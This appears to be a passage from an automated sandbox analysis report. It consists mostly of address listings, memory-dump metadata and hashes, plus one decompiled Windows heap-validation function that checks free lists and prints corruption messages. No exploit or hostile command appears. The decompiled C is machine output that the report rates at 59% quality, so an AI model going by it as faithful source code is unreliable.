                                                                                                                                                              0x009f01d6
                                                                                                                                                              0x009f01d6
                                                                                                                                                              0x009f01d8
                                                                                                                                                              0x009f01e8
                                                                                                                                                              0x009f01ef
                                                                                                                                                              0x009f01da
                                                                                                                                                              0x009f01da
                                                                                                                                                              0x009f01da
                                                                                                                                                              0x009f01da
                                                                                                                                                              0x009f01d8
                                                                                                                                                              0x009f021d
                                                                                                                                                              0x009f021f
                                                                                                                                                              0x009f0222
                                                                                                                                                              0x009f0226
                                                                                                                                                              0x009f0229
                                                                                                                                                              0x009f022b
                                                                                                                                                              0x009f022b
                                                                                                                                                              0x009f0230
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f01b2
                                                                                                                                                              0x009f01b2
                                                                                                                                                              0x009f01b2
                                                                                                                                                              0x009f01b4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f01b6
                                                                                                                                                              0x009f01bd
                                                                                                                                                              0x009f01bf
                                                                                                                                                              0x009f01c0
                                                                                                                                                              0x009f01c2
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f01c2
                                                                                                                                                              0x009f01c4
                                                                                                                                                              0x009f01c6
                                                                                                                                                              0x009f0238
                                                                                                                                                              0x009f0238
                                                                                                                                                              0x009f0238
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0238
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f01c6
                                                                                                                                                              0x009f0130
                                                                                                                                                              0x009f0133
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0135
                                                                                                                                                              0x009f0138
                                                                                                                                                              0x009f013c
                                                                                                                                                              0x009f013f
                                                                                                                                                              0x009f0141
                                                                                                                                                              0x009f0141
                                                                                                                                                              0x009f0141
                                                                                                                                                              0x009f0146
                                                                                                                                                              0x009f0177
                                                                                                                                                              0x009f0177
                                                                                                                                                              0x009f017a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f014b
                                                                                                                                                              0x009f014d
                                                                                                                                                              0x009f0161
                                                                                                                                                              0x009f014f
                                                                                                                                                              0x009f014f
                                                                                                                                                              0x009f0152
                                                                                                                                                              0x009f0155
                                                                                                                                                              0x009f0157
                                                                                                                                                              0x009f0159
                                                                                                                                                              0x009f0159
                                                                                                                                                              0x009f0159
                                                                                                                                                              0x009f015c
                                                                                                                                                              0x009f015c
                                                                                                                                                              0x009f016d
                                                                                                                                                              0x009f016f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0175
                                                                                                                                                              0x009f0175
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0175
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f016f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f011a
                                                                                                                                                              0x009f011d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f011d
                                                                                                                                                              0x009f0118
                                                                                                                                                              0x009f00eb
                                                                                                                                                              0x009f00a7
                                                                                                                                                              0x009f008f
                                                                                                                                                              0x009f008f
                                                                                                                                                              0x009f0096
                                                                                                                                                              0x009f0098
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0098
                                                                                                                                                              0x009f0055
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0055
                                                                                                                                                              0x009f0010
                                                                                                                                                              0x009f0015
                                                                                                                                                              0x009f0017
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0021
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0021
                                                                                                                                                              0x009eff2e
                                                                                                                                                              0x009eff3b
                                                                                                                                                              0x009eff3b
                                                                                                                                                              0x009eff3e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009eff33
                                                                                                                                                              0x009eff35
                                                                                                                                                              0x009eff37
                                                                                                                                                              0x009eff4a
                                                                                                                                                              0x009eff4a
                                                                                                                                                              0x009eff4b
                                                                                                                                                              0x009eff4e
                                                                                                                                                              0x009eff50
                                                                                                                                                              0x009eff53
                                                                                                                                                              0x009eff57
                                                                                                                                                              0x009eff5a
                                                                                                                                                              0x009eff5c
                                                                                                                                                              0x009eff5c
                                                                                                                                                              0x009eff5c
                                                                                                                                                              0x009eff61
                                                                                                                                                              0x009eff64
                                                                                                                                                              0x009eff66
                                                                                                                                                              0x009eff6b
                                                                                                                                                              0x009eff6e
                                                                                                                                                              0x009eff75
                                                                                                                                                              0x009eff77
                                                                                                                                                              0x009eff79
                                                                                                                                                              0x009eff79
                                                                                                                                                              0x009eff79
                                                                                                                                                              0x009eff79
                                                                                                                                                              0x009eff7f
                                                                                                                                                              0x009eff82
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009eff84
                                                                                                                                                              0x009eff84
                                                                                                                                                              0x009eff87
                                                                                                                                                              0x009eff8a
                                                                                                                                                              0x009eff8c
                                                                                                                                                              0x009eff8c
                                                                                                                                                              0x009eff8c
                                                                                                                                                              0x009eff8d
                                                                                                                                                              0x009eff90
                                                                                                                                                              0x009eff93
                                                                                                                                                              0x009effd5
                                                                                                                                                              0x009effd8
                                                                                                                                                              0x009effde
                                                                                                                                                              0x009effde
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009effde
                                                                                                                                                              0x009effda
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009eff95
                                                                                                                                                              0x009eff95
                                                                                                                                                              0x009eff98
                                                                                                                                                              0x009effc9
                                                                                                                                                              0x009effcf
                                                                                                                                                              0x009effe1
                                                                                                                                                              0x009effe1
                                                                                                                                                              0x009effec
                                                                                                                                                              0x009efff9
                                                                                                                                                              0x009efff9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efff9
                                                                                                                                                              0x009eff9a
                                                                                                                                                              0x009eff9e
                                                                                                                                                              0x009effb0
                                                                                                                                                              0x009effa0
                                                                                                                                                              0x009effa0
                                                                                                                                                              0x009effa3
                                                                                                                                                              0x009effa6
                                                                                                                                                              0x009effa8
                                                                                                                                                              0x009effa8
                                                                                                                                                              0x009effa8
                                                                                                                                                              0x009effab
                                                                                                                                                              0x009effab
                                                                                                                                                              0x009effba
                                                                                                                                                              0x009effba
                                                                                                                                                              0x009effbc
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009effbe
                                                                                                                                                              0x009effc4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009effc4
                                                                                                                                                              0x009effbc
                                                                                                                                                              0x009eff93
                                                                                                                                                              0x009eff82
                                                                                                                                                              0x009eff39
                                                                                                                                                              0x009eff39
                                                                                                                                                              0x009eff40
                                                                                                                                                              0x009eff42
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009eff42
                                                                                                                                                              0x009efef4
                                                                                                                                                              0x009efe58
                                                                                                                                                              0x009efeb0
                                                                                                                                                              0x009efeb4
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efec9
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efec9
                                                                                                                                                              0x009efe5a
                                                                                                                                                              0x009efe5c
                                                                                                                                                              0x009efe6f
                                                                                                                                                              0x009efe5e
                                                                                                                                                              0x009efe64
                                                                                                                                                              0x009efe64
                                                                                                                                                              0x009efe75
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efe7c
                                                                                                                                                              0x009efe92
                                                                                                                                                              0x009efe97
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efe99
                                                                                                                                                              0x009efea0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efea2
                                                                                                                                                              0x009efea5
                                                                                                                                                              0x009efeab
                                                                                                                                                              0x009efeae
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efeae
                                                                                                                                                              0x009efe7e
                                                                                                                                                              0x009efe83
                                                                                                                                                              0x009efe8b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efe8d
                                                                                                                                                              0x009efe8d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009efe8d
                                                                                                                                                              0x009efe8b
                                                                                                                                                              0x009f0454
                                                                                                                                                              0x009f0457
                                                                                                                                                              0x009f0457
                                                                                                                                                              0x009f0460
                                                                                                                                                              0x009f0463
                                                                                                                                                              0x009f0463
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0463

                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                                                                                                                              • API String ID: 0-3591852110
                                                                                                                                                              • Opcode ID: 47dbd6cbdc8325fb9d55856e117a107bbac848290026dc1aaf0cb1ed4c46f096
                                                                                                                                                              • Instruction ID: 4a7831c021f8e7a12e410aa7c9ed5360807fddbab44c0808614e2ec642123f68
                                                                                                                                                              • Opcode Fuzzy Hash: 47dbd6cbdc8325fb9d55856e117a107bbac848290026dc1aaf0cb1ed4c46f096
                                                                                                                                                              • Instruction Fuzzy Hash: 5862E470600649DFCB24CF69C490ABAB7F9FF89314B14C4ADE6858B652D734ED41DB60
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 009F098E, Relevance: 11.7, Strings: 9, Instructions: 401COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 59%
                                                                                                                                                              			E009F098E(void* __ecx, unsigned int __edx, signed int _a4, char _a8) {
				signed int _v8;
				signed int _v12;
				signed int* _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int* _t165;
				intOrPtr _t168;
				signed short _t181;
				intOrPtr _t183;
				signed int* _t204;
				signed int _t209;
				signed int _t214;
				signed int* _t216;
				signed int _t226;
				signed int _t228;
				signed int _t233;
				intOrPtr _t235;
				intOrPtr _t246;
				intOrPtr _t257;
				signed int _t280;
				signed int* _t281;
				signed int* _t282;
				signed short _t284;
				signed short _t286;
				signed char _t288;
				intOrPtr* _t298;
				signed int _t309;
				signed int _t310;
				signed int* _t311;
				unsigned int _t312;
				signed int* _t313;
				signed int _t314;
				signed int _t315;
				intOrPtr _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;

				_t308 = __edx;
				_t311 = _a4;
				_v12 = 0;
				_v8 = 0;
				_v16 = _t311;
				if(E009EFB7A(__ecx, __edx, _t311, 0) == 0) {
					L84:
					E009F06F9(_v16);
					_t337 = _v8;
					if(_v8 != 0) {
						_a4 = _a4 & 0x00000000;
						E00954167(_t308, _t337, 0xffffffff,  &_v8,  &_a4, 0x8000);
					}
					L48:
					return 0;
				}
				if(_a8 != 0 || (_t311[0x10] & 0x20000000) != 0) {
					_t308 = 0;
					_t165 =  &(_t311[0x31]);
					_t280 =  *_t165;
					_a8 = 0;
					_v24 = 0;
					while(_t165 != _t280) {
						_t280 =  *_t280;
						_a4 =  *_t313 & 0x0000ffff;
						_t288 = _t313[0];
						_v16 = _t313;
						__eflags = _t288 & 0x00000001;
						if((_t288 & 0x00000001) != 0) {
							_t168 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t168 + 0xc);
							if( *(_t168 + 0xc) == 0) {
								_push("HEAP: ");
								E0099373B();
							} else {
								E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t313);
							E0099373B("dedicated (%04x) free list element %p is marked busy\n", _a4);
							L22:
							__eflags = _t311[0x13];
							if(_t311[0x13] != 0) {
								_t313[0] = _t313[0] ^ _t313[0] ^  *_t313;
								 *_t313 =  *_t313 ^ _t311[0x14];
							}
							goto L84;
						}
						_t181 =  *_t313 & 0x0000ffff;
						__eflags = _t181 - _v24;
						if(_t181 < _v24) {
							_t183 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t183 + 0xc);
							if( *(_t183 + 0xc) == 0) {
								_push("HEAP: ");
								E0099373B();
							} else {
								E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							E0099373B("Non-Dedicated free list element %p is out of order\n", _t313);
							goto L22;
						}
						_t308 = 0;
						_v24 = _t181 & 0x0000ffff;
						__eflags = _t311[0x13];
						if(_t311[0x13] != 0) {
							_t313[0] = _t313[0] ^ _t288 ^  *_t313;
							 *_t313 =  *_t313 ^ _t311[0x14];
							__eflags =  *_t313;
						}
						_t29 =  &_a8;
						 *_t29 = _a8 + 1;
						__eflags =  *_t29;
						_t165 =  &(_t311[0x31]);
					}
					_a4 = 0x208 + (_t311[0x22] & 0x0000ffff) * 4;
					if( *0xa292a4 != 0 && _t311[0x30] != _t308) {
						_push(4);
						_push(0x1000);
						_push( &_a4);
						_push(0);
						_push( &_v8);
						if(E0093FAD0(0xffffffff) >= 0) {
							_v12 = _v8 + 0x204;
						}
					}
					_t204 =  &(_t311[0x28]);
					_t314 =  *_t204;
					while(_t204 != _t314) {
						__eflags = _t311[0x13];
						_t281 = _t314 + 0x18;
						if(_t311[0x13] != 0) {
							 *_t281 =  *_t281 ^ _t311[0x14];
							__eflags = _t281[0] - (_t281[0] ^ _t281[0] ^  *_t281);
							if(__eflags != 0) {
								_push(0);
								_push(_t281);
								_push(_t311);
								E009EF8EE(_t281, _t311, _t314, __eflags);
							}
						}
						_t295 = _v12;
						__eflags = _t295;
						if(_t295 == 0) {
							L39:
							__eflags =  *(_t314 + 0x1a) & 0x00000004;
							if(( *(_t314 + 0x1a) & 0x00000004) == 0) {
								L41:
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									_t281[0] = _t281[0] ^ _t281[0] ^  *_t281;
									 *_t281 =  *_t281 ^ _t311[0x14];
									__eflags =  *_t281;
								}
								_t314 =  *_t314;
								_t204 =  &(_t311[0x28]);
								continue;
							}
							_t209 = E009D579A(_t295, _t311, _t281);
							__eflags = _t209;
							if(_t209 == 0) {
								__eflags = _t311[0x13];
								if(_t311[0x13] != 0) {
									 *(_t314 + 0x1b) =  *(_t314 + 0x1a) ^  *(_t314 + 0x19) ^  *(_t314 + 0x18);
									_t95 = _t314 + 0x18;
									 *_t95 =  *(_t314 + 0x18) ^ _t311[0x14];
									__eflags =  *_t95;
								}
								goto L48;
							}
							goto L41;
						} else {
							_t214 =  *(_t314 + 0xa) & 0x0000ffff;
							__eflags = _t214;
							if(_t214 == 0) {
								goto L39;
							}
							__eflags = _t214 & 0x00008000;
							if((_t214 & 0x00008000) == 0) {
								__eflags = _t214 & 0x00000800;
								if((_t214 & 0x00000800) != 0) {
									goto L39;
								}
								__eflags = _t214 - _t311[0x22];
								if(_t214 >= _t311[0x22]) {
									goto L39;
								}
								L38:
								_t216 = _t295 + (_t214 & 0x0000ffff) * 4;
								_t295 =  *(_t314 + 0x10) >> 3;
								 *_t216 =  *_t216 + ( *(_t314 + 0x10) >> 3);
								__eflags =  *_t216;
								goto L39;
							}
							_t214 = _t214 & 0x00007fff;
							_t295 = 0x81;
							__eflags = _t214 - 0x81;
							if(_t214 >= 0x81) {
								goto L39;
							}
							_t295 = _v8;
							goto L38;
						}
					}
					_v20 = _v20 & 0x00000000;
					_v24 = _v24 & 0x00000000;
					_t282 =  &(_t311[0x2a]);
					_t315 =  *_t282;
					while(_t315 != _t282) {
						_t226 = E009EFDDD(_t311, _t315 - 0x10, 0,  &_v20,  &_v24,  &_v16, _v12, _v8);
						__eflags = _t226;
						if(_t226 == 0) {
							goto L84;
						}
						_t315 =  *_t315;
					}
					_t316 = _a8;
					_v16 = _t311;
					if(_t316 == _v20) {
						__eflags = _t311[0x1e] - _v24;
						if(_t311[0x1e] == _v24) {
							_t228 = _v8;
							__eflags = _t228;
							if(_t228 == 0) {
								goto L74;
							}
							_t317 = _t311[0x30];
							__eflags = _t317;
							if(_t317 == 0) {
								L68:
								_t318 = _t311[0x23];
								__eflags = _t318;
								if(__eflags == 0) {
									L73:
									_a4 = 0;
									E00954167(_t308, __eflags, 0xffffffff,  &_v8,  &_a4, 0x8000);
									goto L74;
								}
								_t233 = _t311[0x22] & 0x0000ffff;
								_t284 = 1;
								_t308 = 1;
								__eflags = 1 - _t233;
								if(__eflags >= 0) {
									goto L73;
								}
								_t312 = _v12;
								while(1) {
									_t309 = _t284 & 0x0000ffff;
									_t308 =  *(_t312 + _t309 * 4);
									_t318 = _t318 + 0x40;
									__eflags =  *(_t312 + _t309 * 4) -  *((intOrPtr*)(_t318 + 8));
									if( *(_t312 + _t309 * 4) !=  *((intOrPtr*)(_t318 + 8))) {
										break;
									}
									_t284 = _t284 + 1;
									__eflags = _t284 - _t233;
									if(__eflags < 0) {
										continue;
									}
									goto L73;
								}
								_t235 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t235 + 0xc);
								if( *(_t235 + 0xc) == 0) {
									_push("HEAP: ");
									E0099373B();
								} else {
									E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_t298 = _t312 + (_t284 & 0x0000ffff) * 4;
								_push(_t298);
								_push( *_t298);
								_t319 = _t318 + 0x10;
								__eflags = _t319;
								_push( *((intOrPtr*)(_t319 - 8)));
								_push(_t319);
								E0099373B("Tag %04x (%ws) size incorrect (%x != %x) %p\n", _t284 & 0x0000ffff);
								goto L84;
							}
							_t286 = 1;
							__eflags = 1;
							while(1) {
								_t310 = _t286 & 0x0000ffff;
								_t308 =  *(_t228 + _t310 * 4);
								_t317 = _t317 + 0xc;
								__eflags =  *(_t228 + _t310 * 4) -  *((intOrPtr*)(_t317 + 8));
								if( *(_t228 + _t310 * 4) !=  *((intOrPtr*)(_t317 + 8))) {
									break;
								}
								_t286 = _t286 + 1;
								_t308 = 0x81;
								__eflags = _t286 - 0x81;
								if(_t286 < 0x81) {
									continue;
								}
								goto L68;
							}
							_t246 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
							__eflags =  *(_t246 + 0xc);
							if( *(_t246 + 0xc) == 0) {
								_push("HEAP: ");
								E0099373B();
							} else {
								E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
							}
							_push( *((intOrPtr*)(_v8 + (_t286 & 0x0000ffff) * 4)));
							_push( *((intOrPtr*)(_t317 + 8)));
							E0099373B("Pseudo Tag %04x size incorrect (%x != %x) %p\n", _t286 & 0x0000ffff);
							goto L84;
						}
						_t257 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t257 + 0xc);
						if( *(_t257 + 0xc) == 0) {
							_push("HEAP: ");
							E0099373B();
						} else {
							E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_t311[0x1e]);
						_push(_v24);
						_push("Total size of free blocks in arena (%ld) does not match number total in heap header (%ld)\n");
						L57:
						E0099373B();
						goto L84;
					}
					if( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) == 0) {
						_push("HEAP: ");
						E0099373B();
					} else {
						E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t316);
					_push(_v20);
					_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
					goto L57;
				} else {
					L74:
					return 1;
				}
			}












































                                                                                                                                                              0x009f098e
                                                                                                                                                              0x009f0999
                                                                                                                                                              0x009f09a0
                                                                                                                                                              0x009f09a3
                                                                                                                                                              0x009f09a6
                                                                                                                                                              0x009f09b0
                                                                                                                                                              0x009f0e2c
                                                                                                                                                              0x009f0e2f
                                                                                                                                                              0x009f0e34
                                                                                                                                                              0x009f0e38
                                                                                                                                                              0x009f0e3e
                                                                                                                                                              0x009f0e51
                                                                                                                                                              0x009f0e51
                                                                                                                                                              0x009f0c22
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0c22
                                                                                                                                                              0x009f09ba
                                                                                                                                                              0x009f09c9
                                                                                                                                                              0x009f09cb
                                                                                                                                                              0x009f09d1
                                                                                                                                                              0x009f09d3
                                                                                                                                                              0x009f09d6
                                                                                                                                                              0x009f0a47
                                                                                                                                                              0x009f0a01
                                                                                                                                                              0x009f0a03
                                                                                                                                                              0x009f0a06
                                                                                                                                                              0x009f0a09
                                                                                                                                                              0x009f0a0c
                                                                                                                                                              0x009f0a0f
                                                                                                                                                              0x009f0aa7
                                                                                                                                                              0x009f0aaa
                                                                                                                                                              0x009f0aae
                                                                                                                                                              0x009f0ad0
                                                                                                                                                              0x009f0ad5
                                                                                                                                                              0x009f0ab0
                                                                                                                                                              0x009f0ac8
                                                                                                                                                              0x009f0acd
                                                                                                                                                              0x009f0adb
                                                                                                                                                              0x009f0ae4
                                                                                                                                                              0x009f0aec
                                                                                                                                                              0x009f0aec
                                                                                                                                                              0x009f0af0
                                                                                                                                                              0x009f0afe
                                                                                                                                                              0x009f0b04
                                                                                                                                                              0x009f0b04
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0af0
                                                                                                                                                              0x009f0a15
                                                                                                                                                              0x009f0a18
                                                                                                                                                              0x009f0a1c
                                                                                                                                                              0x009f0b11
                                                                                                                                                              0x009f0b14
                                                                                                                                                              0x009f0b18
                                                                                                                                                              0x009f0b3a
                                                                                                                                                              0x009f0b3f
                                                                                                                                                              0x009f0b1a
                                                                                                                                                              0x009f0b32
                                                                                                                                                              0x009f0b37
                                                                                                                                                              0x009f0b4b
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0b51
                                                                                                                                                              0x009f0a25
                                                                                                                                                              0x009f0a27
                                                                                                                                                              0x009f0a2a
                                                                                                                                                              0x009f0a2d
                                                                                                                                                              0x009f0a36
                                                                                                                                                              0x009f0a3c
                                                                                                                                                              0x009f0a3c
                                                                                                                                                              0x009f0a3c
                                                                                                                                                              0x009f0a3e
                                                                                                                                                              0x009f0a3e
                                                                                                                                                              0x009f0a3e
                                                                                                                                                              0x009f0a41
                                                                                                                                                              0x009f0a41
                                                                                                                                                              0x009f0a60
                                                                                                                                                              0x009f0a63
                                                                                                                                                              0x009f0a6d
                                                                                                                                                              0x009f0a6f
                                                                                                                                                              0x009f0a77
                                                                                                                                                              0x009f0a78
                                                                                                                                                              0x009f0a7d
                                                                                                                                                              0x009f0a87
                                                                                                                                                              0x009f0a91
                                                                                                                                                              0x009f0a91
                                                                                                                                                              0x009f0a87
                                                                                                                                                              0x009f0a94
                                                                                                                                                              0x009f0a9a
                                                                                                                                                              0x009f0bf0
                                                                                                                                                              0x009f0b54
                                                                                                                                                              0x009f0b58
                                                                                                                                                              0x009f0b5b
                                                                                                                                                              0x009f0b60
                                                                                                                                                              0x009f0b6a
                                                                                                                                                              0x009f0b6d
                                                                                                                                                              0x009f0b6f
                                                                                                                                                              0x009f0b71
                                                                                                                                                              0x009f0b72
                                                                                                                                                              0x009f0b73
                                                                                                                                                              0x009f0b73
                                                                                                                                                              0x009f0b6d
                                                                                                                                                              0x009f0b78
                                                                                                                                                              0x009f0b7b
                                                                                                                                                              0x009f0b7d
                                                                                                                                                              0x009f0bc1
                                                                                                                                                              0x009f0bc1
                                                                                                                                                              0x009f0bc5
                                                                                                                                                              0x009f0bd2
                                                                                                                                                              0x009f0bd2
                                                                                                                                                              0x009f0bd6
                                                                                                                                                              0x009f0be0
                                                                                                                                                              0x009f0be6
                                                                                                                                                              0x009f0be6
                                                                                                                                                              0x009f0be6
                                                                                                                                                              0x009f0be8
                                                                                                                                                              0x009f0bea
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0bea
                                                                                                                                                              0x009f0bc9
                                                                                                                                                              0x009f0bce
                                                                                                                                                              0x009f0bd0
                                                                                                                                                              0x009f0c0a
                                                                                                                                                              0x009f0c0e
                                                                                                                                                              0x009f0c19
                                                                                                                                                              0x009f0c1f
                                                                                                                                                              0x009f0c1f
                                                                                                                                                              0x009f0c1f
                                                                                                                                                              0x009f0c1f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0c0e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0b7f
                                                                                                                                                              0x009f0b7f
                                                                                                                                                              0x009f0b83
                                                                                                                                                              0x009f0b86
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0b88
                                                                                                                                                              0x009f0b8d
                                                                                                                                                              0x009f0ba3
                                                                                                                                                              0x009f0ba8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0baa
                                                                                                                                                              0x009f0bb1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0bb3
                                                                                                                                                              0x009f0bb6
                                                                                                                                                              0x009f0bbc
                                                                                                                                                              0x009f0bbf
                                                                                                                                                              0x009f0bbf
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0bbf
                                                                                                                                                              0x009f0b8f
                                                                                                                                                              0x009f0b94
                                                                                                                                                              0x009f0b99
                                                                                                                                                              0x009f0b9c
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0b9e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0b9e
                                                                                                                                                              0x009f0b7d
                                                                                                                                                              0x009f0bf8
                                                                                                                                                              0x009f0bfc
                                                                                                                                                              0x009f0c00
                                                                                                                                                              0x009f0c06
                                                                                                                                                              0x009f0c51
                                                                                                                                                              0x009f0c42
                                                                                                                                                              0x009f0c47
                                                                                                                                                              0x009f0c49
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0c4f
                                                                                                                                                              0x009f0c4f
                                                                                                                                                              0x009f0c55
                                                                                                                                                              0x009f0c58
                                                                                                                                                              0x009f0c5e
                                                                                                                                                              0x009f0cb3
                                                                                                                                                              0x009f0cb6
                                                                                                                                                              0x009f0cff
                                                                                                                                                              0x009f0d04
                                                                                                                                                              0x009f0d06
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d08
                                                                                                                                                              0x009f0d0e
                                                                                                                                                              0x009f0d10
                                                                                                                                                              0x009f0d2e
                                                                                                                                                              0x009f0d2e
                                                                                                                                                              0x009f0d34
                                                                                                                                                              0x009f0d36
                                                                                                                                                              0x009f0d60
                                                                                                                                                              0x009f0d6f
                                                                                                                                                              0x009f0d72
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d72
                                                                                                                                                              0x009f0d38
                                                                                                                                                              0x009f0d41
                                                                                                                                                              0x009f0d42
                                                                                                                                                              0x009f0d44
                                                                                                                                                              0x009f0d47
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d49
                                                                                                                                                              0x009f0d4c
                                                                                                                                                              0x009f0d4c
                                                                                                                                                              0x009f0d4f
                                                                                                                                                              0x009f0d52
                                                                                                                                                              0x009f0d55
                                                                                                                                                              0x009f0d58
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d5a
                                                                                                                                                              0x009f0d5b
                                                                                                                                                              0x009f0d5e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009f0d5e
                                                                                                                                                              0x009f0ddb
                                                                                                                                                              0x009f0dde
                                                                                                                                                              0x009f0de1
                                                                                                                                                              0x009f0e03
                                                                                                                                                              0x009f0e08
                                                                                                                                                              0x009f0de3
                                                                                                                                                              0x009f0dfb
                                                                                                                                                              0x009f0e00
                                                                                                                                                              0x009f0e11
                                                                                                                                                              0x009f0e14
                                                                                                                                                              0x009f0e15
                                                                                                                                                              0x009f0e17
                                                                                                                                                              0x009f0e17
                                                                                                                                                              0x009f0e1a
                                                                                                                                                              0x009f0e1d
                                                                                                                                                              0x009f0e24
                                                                                                                                                              0x00000000
